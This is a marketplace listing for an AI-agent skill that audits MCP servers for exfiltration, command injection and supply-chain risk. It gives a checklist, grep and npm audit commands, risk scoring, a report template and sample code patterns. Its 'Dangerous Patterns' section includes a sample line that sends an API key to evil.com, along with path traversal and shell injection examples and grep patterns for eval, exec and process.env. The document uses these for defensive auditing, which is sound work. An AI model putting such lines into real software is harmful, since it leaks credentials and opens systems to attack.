← 返回 Skills 市场

Skill Mcp Security Audit

Name: Skill Mcp Security Audit
Author: aptratcn

作者 Erwin · GitHub ↗ · v1.1.0 · MIT-0

cross-platform ✓ 安全检测通过

总下载

当前安装

版本数

在 OpenClaw 中安装

/install mcp-security-audit

功能描述

Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.

使用说明 (SKILL.md)

MCP Security Audit 🔒

Don't blindly trust MCP servers. Audit them first.

The Problem

MCP (Model Context Protocol) servers give AI agents powerful capabilities - file access, API calls, code execution. But they can also:

Exfiltrate data to external servers
Execute arbitrary commands on your machine
Access files beyond intended scope
Chain vulnerabilities for privilege escalation

Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.

Quick Audit Checklist

1. Source Verification ✅

□ Is this an official/verified package?
□ Check npm/PyPI download counts and maintainer history
□ Review recent commits for suspicious changes
□ Verify package signature if available

2. Network Audit 🌐

□ List all external URLs/domains the MCP connects to
□ Check for hardcoded API endpoints
□ Verify TLS certificate validation is enabled
□ Flag any data sent to unknown domains

3. File Access Audit 📁

□ What directories can the MCP read/write?
□ Is access scoped to project directory only?
□ Check for path traversal vulnerabilities
□ Flag any access to ~/.ssh, ~/.config, env files

4. Command Execution Audit ⚡

□ Does the MCP execute shell commands?
□ Are commands user-controlled or hardcoded?
□ Check for command injection vectors
□ Verify sandboxing/isolation if present

5. Permission Scope Audit 🔑

□ What permissions does the MCP request?
□ Are permissions minimal (principle of least privilege)?
□ Check for excessive scope requests
□ Verify user consent for sensitive operations

6. Dependency Audit 📦

□ Run npm audit / pip-audit / cargo audit
□ Check for known CVEs in dependencies
□ Flag outdated packages with security fixes
□ Review transitive dependencies

Audit Commands

For npm-based MCP servers:

# Check package.json for suspicious scripts
cat package.json | jq '.scripts'

# Audit dependencies
npm audit

# Check for post-install scripts
cat package.json | jq '.scripts.postinstall, .scripts.preinstall'

# List network calls (requires grep)
grep -r "fetch\|axios\|http\|https\|ws://" src/ --include="*.js" --include="*.ts"

For Python MCP servers:

# Check requirements.txt for suspicious packages
cat requirements.txt

# Audit dependencies
pip-audit

# Check for network calls
grep -r "requests\|urllib\|httpx\|aiohttp" src/ --include="*.py"

# Check for subprocess calls
grep -r "subprocess\|os.system\|exec\|eval" src/ --include="*.py"

Risk Scoring

Category	Weight	High Risk Indicators
Network	30%	Unknown domains, no TLS, data exfil patterns
File Access	25%	Home dir access, path traversal, sensitive files
Command Exec	25%	Unsanitized input, shell=True, arbitrary commands
Dependencies	15%	Known CVEs, unmaintained packages
Source	5%	Unverified maintainer, recent ownership change

Score ≥ 70: High risk - Do not use without review Score 40-69: Medium risk - Use with caution Score \x3C 40: Low risk - Generally safe

Red Flags 🚩

Immediately reject MCP servers with:

Obfuscated code - eval(atob('...')) or similar
Dynamic code loading - Loading code from remote URLs
Environment variable exfil - Sending process.env or os.environ externally
Credential harvesting - Asking for passwords/tokens unnecessarily
No source code - Binary-only distributions without reproducible builds

Audit Report Template

# MCP Security Audit Report

**Server**: [name]
**Version**: [version]
**Audited**: [date]
**Risk Score**: [score]/100

## Findings

### Critical
- [list critical issues]

### High
- [list high issues]

### Medium
- [list medium issues]

### Low
- [list low issues]

## Recommendations

1. [recommendation]
2. [recommendation]

## Verdict

[ ] APPROVED - Safe to use
[ ] APPROVED WITH CAUTION - Review recommendations
[ ] REJECTED - Too many risks

Common MCP Security Patterns

Safe Patterns ✅

// Scoped file access
const allowedDir = path.resolve(process.cwd(), 'data');
if (!filePath.startsWith(allowedDir)) throw new Error('Access denied');

// Sanitized commands
const allowedCommands = ['git', 'npm', 'node'];
if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');

// Explicit user consent
if (!await askUserConsent('Allow access to X?')) return;

Dangerous Patterns ❌

// DON'T: Unrestricted file read
fs.readFileSync(userInput); // Path traversal!

// DON'T: Shell injection
exec(`git ${userBranch}`); // Command injection!

// DON'T: Credential exposure
fetch('https://evil.com/steal?token=' + process.env.API_KEY);

Integration with CI/CD

Add to your workflow:

# .github/workflows/mcp-audit.yml
name: MCP Security Audit
on: [push, pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Audit MCP servers
        run: |
          # Add your audit commands here
          npm audit
          # Check for suspicious patterns
          grep -r "eval\|exec\|process.env" mcp-servers/ && exit 1

Related Skills

prompt-guard - Protect against prompt injection
skill-error-recovery - Handle MCP connection failures gracefully
token-budget-guard - Monitor MCP token usage

References

Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.

安全使用建议

This is a procedural audit checklist (no code). It's generally safe to use. Before running the recommended commands, ensure you have local copies of the MCP server code (don't run arbitrary install scripts from untrusted packages), run the audit in an isolated environment if possible, and make sure the host has the tools the guide references (jq, grep, npm, pip-audit). The checklist may produce false positives; use manual review for high-risk findings and verify package provenance and signatures before enabling an MCP server in production.

功能分析

Type: OpenClaw Skill Name: mcp-security-audit Version: 1.1.0 The skill bundle is a defensive security tool designed to guide an AI agent in auditing Model Context Protocol (MCP) servers for vulnerabilities. Both SKILL.md and README.md provide legitimate security checklists, risk scoring frameworks, and standard audit commands (e.g., 'npm audit', 'grep' for sensitive patterns) aimed at detecting data exfiltration and command injection. There is no evidence of malicious intent, obfuscation, or harmful instructions; the content is entirely aligned with its stated purpose of improving security posture.

能力标签

requires-sensitive-credentials

能力评估

✓ Purpose & Capability

The name/description and the SKILL.md consistently describe an MCP security audit. The skill requests no credentials, binaries, or installs, which is proportionate for a procedural audit/checklist.

ℹ Instruction Scope

The SKILL.md tells the operator to run local inspection commands (grep, npm audit, pip-audit, review package.json, etc.) and to check for access to sensitive paths like ~/.ssh or process.env. Those actions are appropriate for an audit, but they assume access to source code and host tooling. The instructions do not instruct exfiltration or contacting any hidden endpoints.

✓ Install Mechanism

No install spec or code files — instruction-only — so nothing will be written to disk by the skill itself. This is the lowest-risk install model.

✓ Credentials

The skill declares no required environment variables or credentials. The SKILL.md sensibly recommends checking for credential leakage but does not ask for secrets from the user.

✓ Persistence & Privilege

always is false and the skill is user-invocable; model invocation is allowed (the platform default). There is no request for permanent system presence or to modify other skills or global agent settings.

如何使用

确保已安装 OpenClaw（本地或 Docker 部署）
在对话框中输入安装命令：/install mcp-security-audit
安装完成后，直接呼叫该 Skill 的名称或使用 /mcp-security-audit 触发
根据 Skill 的参数说明提供必要输入，即可获得结构化输出

版本历史

v1.1.0

v1.1: Audit flow diagram, sample report, safe/unsafe code patterns

元数据

Slug mcp-security-audit

版本 1.1.0

许可证 MIT-0

累计安装 0

当前安装数 0

历史版本数 1

常见问题